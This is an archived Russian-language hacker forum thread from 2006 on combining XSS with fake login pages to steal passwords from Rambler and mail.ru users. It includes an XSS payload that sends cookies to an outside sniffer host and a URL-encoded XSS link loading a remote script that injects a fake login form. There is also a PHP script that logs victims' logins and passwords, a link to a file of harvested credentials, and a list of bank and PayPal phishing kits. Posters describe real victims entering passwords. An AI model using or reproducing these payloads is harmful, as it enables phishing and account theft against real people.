PDA

Просмотр полной версии : XSS + Feik

__XT__
16.11.2006, 14:37
Feik - старая пассивная атака, метод подмена странички с формой авторизации.

ВОтсь...почему то на этом форуме про фреки не видел. а тем более про их сочетание.
Вы даёте ссылку жертве а она авторизируеться и её куда нить перекидывают а пароль и лог записываем.
это если смещиват с пассивной XSS

А если с активной получаеться весьма неплохо реализовать какую нибудь XSS ...зловредным срипторм сделать форму авторизации...чел псевдо-авторизируеться и перекидываем на что нить такое типа анкеты...чтоб без подозрений.

Особенно я думмаю феки актуальны на ресурсах на которых жизнь сессии кукисов очень мала. Или проверка кукисов по айпи и т.п.

Примером для такого ресурса стал рамблер кукисы которого перехватить очень сложно т.к. они умерают через кророткое время.
Итак представляем фейк с пассивной XSS на рамблере.
Да и XSS найденна не мной её кто-то тут выкладывал...непомню автора.

http://guap-spb.jino-net.ru/log01.txt
slider
16.11.2006, 17:52
Согласен штука занимательная....

Но всё же лучше сделать редирект не на форму с подменой а на сниффер

К примеру....
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>

формочку подобную легко накатать на php, сам такой штукой увлекалсо...
Главное что работает....
Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть....
А тем временем значения пароля и логина которые он вбил сохраняютя...
__XT__
16.11.2006, 20:52
Согласен штука занимательная....

Но всё же лучше сделать редирект не на форму с подменой а на сниффер

К примеру....


формочку подобную легко накатать на php, сам такой штукой увлекалсо...
Главное что работает....
Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть....
А тем временем значения пароля и логина которые он вбил сохраняютя...
да так и есть всё как ты описал-)


"Но всё же лучше сделать редирект не на форму с подменой а на сниффер"
С этим несогласен:
1) не какого редиректа нет...посматрел бы хоть 1.js
2)я же писал выше что феик для сайтов где время жизни сессия приписано данной странички и ли вообще очень мало...т.е. перехватывать кукисы бессмывсленно.
а ты пишешь -
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>
2-й минус - идут кукисы а не пароль.

А в данном фреике всё путём - конечно расичтано на неопытного юзера который не будет глядеть в титле
и дэкодировать урл-)
однако ~70% сразу авторизируються и пароль и логин у меня в логе.





===================================


Ещё ращ кто не понял как юзать:
даём жертве чей ящик на рамблере - урл:

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

там наша форма авторизации с левым <form action=

дальше как жертва авторизировалась её пароль и логин записываеться здесь:

http://guap-spb.jino-net.ru/log01.txt
f0xyL
16.11.2006, 21:44
Вот скрипт для фейка маил ру


<?php

error_reporting(0);

$log = "log.txt";

$today = getdate();
$month = $today[month];
$mday = $today[mday];
$year = $today[year];
$current_date = $mday . " " . $month . " " . $year;

$fp = fopen($log, "a");
$line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n";
$size = strlen($line);
fputs($fp, $line, $size);
fclose($fp);

header("Location: http://win.mail.ru/cgi-bin/auth");

?>
slider
26.11.2006, 15:43
Кстать на Ipb 2.1.7 Фейк мутнул .. офигенно прокатил...
Потом скину темку =)

Или видео сниму )
blackybr
26.11.2006, 15:50
Небольшая коллекция фэйков

http://someshit.net/showthread.php?t=52


BankofAmerica2006.zip
Barclays06.zip
Chase.zip
DEUTCH BANK.rar
Ebay2006.zip
EGold.zip
Epass.zip
Gmail.rar
Isra-test.zip
Kentbnk.zip
Mail_yandex.rar
Paypal06.zip
Paypal-Customers-Scam.rar
POST BANK.rar
eBay.com.
cheet
26.11.2006, 15:58
Кстать на Ipb 2.1.7 Фейк мутнул .. офигенно прокатил...
Потом скину темку =)

Или видео сниму )
давай выыкладывай охото посмотреть
cheet
26.11.2006, 16:14
Вот скрипт для фейка маил ру


<?php

error_reporting(0);

$log = "log.txt";

$today = getdate();
$month = $today[month];
$mday = $today[mday];
$year = $today[year];
$current_date = $mday . " " . $month . " " . $year;

$fp = fopen($log, "a");
$line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n";
$size = strlen($line);
fputs($fp, $line, $size);
fclose($fp);

header("Location: http://win.mail.ru/cgi-bin/auth");

?>

что то он не катит
-voevoda-
29.11.2006, 17:15
да фишка конечно класно
только вопрос возник ссылку нужно делать только на явасскрипт или на Php тожоже пойдет?
просто сам попробовал на Php ссылку дать нехрена не получаеться...